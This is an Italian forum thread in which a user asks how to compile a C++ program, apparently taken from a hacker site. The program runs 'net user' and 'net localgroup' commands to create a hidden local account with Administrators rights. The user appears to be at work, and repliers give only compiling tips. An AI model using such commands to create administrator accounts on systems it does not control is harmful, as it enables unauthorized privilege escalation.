PDA

View Full Version : [C++] Come creare eseguibile con compilatore ?

kansas107
21-03-2009, 16:28
Ciao a tutti,
premetto di non essere una cima nel campo, ma devo creare un eseguibile con il compilatore C++, ho dato uno sguardo a qualche discussione ma nulla di soddisfacente.....devo rendere eseguibile questa stringa:

#include <process.h>
main ()
{
system("net user NomeUtente Password /add");
system("net localgroup Administrators NomeUtente /add");
system("net localgroup Users NomeUtente /delete");
return 0;
}

procedo così: apro un nuovo file sorgente e dopo aver copiato la suddetta stringa provo a cliccare sul tasto "compila".....dovrebbe succedere qualcosa di "ecclatante"??????? mi chiede solo di salvare ma nessuna opzione mi riporta il .exe.........che devo fare??????

Il tutto è per seguire le indicazioni riportate da questo sito http://www.spysystem.it/hacker_adminwinnt.htm ma proprio non riesco a creare questo benedetto eseguibile!!!!!
Ho provato a scaricare anche il visual ma essendo a lavoro non me lo fà installare........

HELP!!!!!

FixFixFix
21-03-2009, 17:19
compilare significa proprio creare l'eseguibile... quindi devi solo capire dove ti ha messo l'eseguibile...cerca...

kansas107
21-03-2009, 17:36
compilare significa proprio creare l'eseguibile... quindi devi solo capire dove ti ha messo l'eseguibile...cerca...

Si ok, ma quando clicco su "compila" mi chiede dove salvare il file.......ma nelle scelte del formato da salvare non c'è il .exe.....ci sono solo i formati .dev *.hpp *.rc *.c *.cpp e all files..........qualsiasi formato io scelga non mi crea nessun "eseguibile"........... :muro:

Aiuuuuuuutooooo :help:

Raiki
21-03-2009, 21:56
Ti chiede dove salvare il file sorgente perche' evidentemente non lo hai fatto prima.Salvalo in .cpp e vedi che poi dovrebbe compilarlo e crearti quindi l'eseguibile.

ps:Ho visto che usi dev-cpp,abbandonalo che e' il demonio materializzato in compilatore:D :D